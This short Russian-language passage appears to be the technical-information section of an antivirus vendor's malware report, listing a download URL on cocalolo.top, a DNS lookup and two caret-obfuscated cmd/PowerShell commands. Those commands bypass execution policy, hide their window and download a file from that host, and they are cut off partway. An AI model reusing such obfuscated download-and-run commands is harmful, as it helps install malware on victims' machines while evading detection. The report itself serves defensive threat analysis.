Техническая информация
- http://cocalolo.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERs^hE^LL.^E^X^e^ -E^XECUTiOnPOli^CY^ B^yPASS ^-^no^PRo^F^iLe -W^i^N^dO^WstyL^E h^Id^d^En ^(Ne^W^-ob^je^CT^ SystEM^.n^Et.^w^EBcLi^E^nt).^d^oWN^loAdFIL^e^('http://coca...
- DNS ASK co###olo.top
- '<SYSTEM32>\cmd.exe' /C "POwERs^hE^LL.^E^X^e^ -E^XECUTiOnPOli^CY^ B^yPASS ^-^no^PRo^F^iLe -W^i^N^dO^WstyL^E h^Id^d^En ^(Ne^W^-ob^je^CT^ SystEM^.n^Et.^w^EBcLi^E^nt).^d^oWN^loAdFIL^e^('http://coca...' (со скрытым окном)